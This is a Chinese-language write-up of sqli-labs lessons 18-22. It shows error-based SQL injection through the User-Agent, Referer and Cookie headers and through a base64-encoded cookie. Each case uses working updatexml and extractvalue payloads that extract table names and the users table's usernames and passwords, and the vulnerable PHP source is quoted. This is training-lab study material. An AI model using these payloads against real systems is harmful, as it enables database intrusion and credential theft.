Sqlilab Less18-22 WriteUp

http字段注入

使用burp拦截post请求,修改字段内容后,放包

User-Agent注入

1.正常登录页面:
在这里插入图片描述
2.拦截登录请求:
在这里插入图片描述
修改User-Agent内容为aaa,放包,页面改变:
在这里插入图片描述
3.通过修改User-Agent进行报错注入:

源代码:

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

找到注入点:
在这里插入图片描述

1',1,1)#

获取数据库名:
在这里插入图片描述

1',1,updatexml(1,concat(0x7e,(select database()),0x7e),1))#

获取表名:
在这里插入图片描述

1',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#

获取users表下的字段名:
在这里插入图片描述

1',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#

获取users表内容:
在这里插入图片描述

1',1,updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1))#

获取users表后面的内容:在这里插入图片描述

1',1,updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),31),1))#

Referer注入

1.正常登陆页面:
在这里插入图片描述
2.拦截登录请求,修改Referer为aaa,放包,页面改变:
在这里插入图片描述
3.通过修改Referer进行报错注入:

源代码:

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

找到注入点:在这里插入图片描述

1',1)#

获取数据库名:在这里插入图片描述

1',updatexml(1,concat(0x7e,(select database()),0x7e),1))#

获取数据库下表名:
在这里插入图片描述

1',updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#

获取users表下字段名:
在这里插入图片描述

1',updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#

获取users表内容:在这里插入图片描述

1',updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1))#

获取users表后面的内容:在这里插入图片描述

1',updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),31),1))#

cookie注入

1.正常登录:
在这里插入图片描述
2.拦截get包,并修改Cookie为admin’,放包,报错:在这里插入图片描述

admin'

3.通过修改Cookie进行报错注入:

源代码:

$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

获取数据库名:
在这里插入图片描述

admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #

获取该数据库下表名
在这里插入图片描述

admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)) #

获取users表下字段名:
在这里插入图片描述

admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e)) #

获取users表内容:
在这里插入图片描述

admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e)) #

获取users表后面的内容:
在这里插入图片描述

admin' and extractvalue(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),31)) #

Base64编码的Cookie注入:

1.正常登录页面:
在这里插入图片描述
发现uname使用base64编码过

2.将admin‘进行base64编码后,拦截下get包,修改Cookie值,放包,报错:
在这里插入图片描述
3.通过修改Cookie进行报错注入:

源代码:

$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";

注入点:
在这里插入图片描述

admin') #
YWRtaW4nKSAj

获取数据库名:
在这里插入图片描述

admin') and extractvalue(1,concat(0x7e,(select database()),0x7e)) #
YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw

其他步骤相同

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值